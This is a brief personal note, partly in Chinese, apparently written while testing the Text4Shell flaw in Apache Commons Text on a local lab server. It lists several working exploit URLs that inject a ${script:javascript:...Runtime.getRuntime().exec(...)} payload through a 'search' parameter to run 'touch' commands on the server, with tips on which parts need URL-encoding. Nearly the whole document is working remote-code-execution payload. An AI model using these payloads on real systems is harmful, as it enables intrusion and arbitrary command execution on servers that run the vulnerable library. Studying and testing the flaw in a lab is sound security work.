# Text2Shell payload good可用 http://localhost/text4shell/attack?search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27touch%20%2Ftmp%2Ffoo%27%29%7D test http://localhost/text4shell/attack?search=%24{script%3Ajavascript%3Ajava.lang.Runtime.getRuntime().exec%28%27touch %2Ftmp%2Ftest'%29%7D - 僅有參數要url encode，網址不可以 - http://localhost/text4shell/attack?search=**%24{script%3Ajavascript%3Ajava.lang.Runtime.getRuntime().exec('touch %2Ftmp%2Ffoo')}** - search=123456$ - search=123456%24